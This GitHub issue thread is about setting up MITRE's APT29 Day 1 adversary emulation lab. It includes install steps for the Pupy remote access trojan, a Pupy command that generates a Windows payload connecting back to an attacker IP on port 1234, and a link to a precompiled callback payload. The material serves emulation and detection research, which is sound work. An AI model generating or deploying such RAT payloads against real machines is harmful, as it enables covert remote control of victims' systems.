Closed mark777t closed 3 years ago
@mark777t sorry to hear you ran into issues. It looks like Pupy has been going through some updates, but check out their Installation guidance -- https://github.com/n1nj4sec/pupy/wiki/Installation. In this case you just need to get Pupy installed and listen on port 1234.
Also, @Cyb3rWard0g had success using a fork and checking out an older branch -- https://github.com/Cyb3rWard0g/docker-pupy/blob/master/20191226/Dockerfile#L56-L58. You may be able to just use his Docker image as well -- https://github.com/Cyb3rWard0g/docker-pupy
Hey @mark777t , yeah, Pupy from last year to today (a lot has changed). I had to create my own image and align it with the latest commit that worked with the setup for Day 1 emulation. The instructions in the README should work for you to try Day 1 😄 .
README: https://github.com/Cyb3rWard0g/docker-pupy
SCRIPT to set up the adversary depending on what day or scenario you are testing: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh
This is the part of the script that I use to run Day 1: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh#L91-L96
Video 😆 : https://youtu.be/fJAuBrzYTzI
Hey @Cyb3rWard0g @jcwilliamsATmitre , thank you for the help. The other issue I get stuck with is that there is no static IP on my machine when trying to create the payload:
gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host
@mark777t check out https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payload_configs.md#create-day-1-payloads. We have also included a compiled payload (calling back to 192.168.0.5, https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads/cod.3aka3.scr) but if you want to generate your own we used the command gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234. Here's the documentation from Pupy too if that helps - https://github.com/n1nj4sec/pupy/wiki/Get-Started#payloads-generation
You will need a static IP on your attacker host (or redirector, if we decide to use one) though, so the payload has somewhere consistent to reach back to.
Found the payload file. In the case of Cyb3rWard0g's setup, the location inside Docker is: /var/lib/docker/overlay2/......./opt/pupy/pupy.....
@Cyb3rWard0g How did you configure the cod.3aka3.scr payload? I configured it to the Linux IP, port 1234 (gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host
Hey @mark777t , I just used the one provided with the results in here: https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads and just aligned my environment with almost all default settings: https://github.com/OTRF/mordor-labs/tree/master/environments/attack-evals/apt29
Also remember that Day 1 has a redirector for Pupy. This is how I set up the redirector and Pupy from a network perspective: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/azuredeploy.json#L286-L311. I hope that helps.
Tested on Ubuntu 18.04.3 LTS
Scenario: as described in install_day1_tools.sh (https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/install_day1_tools.sh)
Install pre-reqs
sudo apt update -y
sudo apt install curl git -y
Install Pupy RAT
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
./install.sh
sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml
The sed command failed because docker-compose.yml doesn't exist.
(Docker is installed on the system.)
Can you please provide steps to fix this issue?
Thanks
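The failure above is the sed step running against a docker-compose.yml that isn't where install_day1_tools.sh expects it. As an added example, not code from the issue, from Pupy or from attack-arsenal, here is a POSIX shell function that does the same 9000 to 1234 port remap but first locates the compose file and refuses to write an empty output when it is missing; the path pupy/conf/docker-compose.yml is the one the script uses, the alternative conf/docker-compose.yml is an assumed fallback for newer checkouts.

```shell
#!/bin/sh
# Remap the Pupy listener port in docker-compose.yml (added example, not
# the project's own script). Fails clearly instead of producing an empty
# /tmp/docker-compose.yml when the file is absent.
#
# Usage: remap_pupy_port <pupy-clone-dir> <from-port> <to-port> <output-file>
remap_pupy_port() {
    clone_dir=$1; from_port=$2; to_port=$3; out=$4
    compose=""
    # First path matches install_day1_tools.sh (clone root + pupy/conf);
    # the second is an assumed fallback for layouts that drop the extra dir.
    for candidate in "$clone_dir/pupy/conf/docker-compose.yml" \
                     "$clone_dir/conf/docker-compose.yml"; do
        if [ -f "$candidate" ]; then
            compose=$candidate
            break
        fi
    done
    if [ -z "$compose" ]; then
        echo "docker-compose.yml not found under $clone_dir;" \
             "check that the clone was recursive and which Pupy commit you are on" >&2
        return 1
    fi
    # Refuse to write a copy that silently keeps the old port.
    if ! grep -q "${from_port}:${from_port}" "$compose"; then
        echo "no ${from_port}:${from_port} mapping in $compose; nothing to remap" >&2
        return 2
    fi
    sed "s/${from_port}:${from_port}/${to_port}:${to_port}/g" "$compose" > "$out"
}
```

Run it as `remap_pupy_port ./pupy 9000 1234 /tmp/docker-compose.yml` from the directory you cloned into; a non-zero exit with the message on stderr tells you the checkout layout differs from what the Day 1 script assumes.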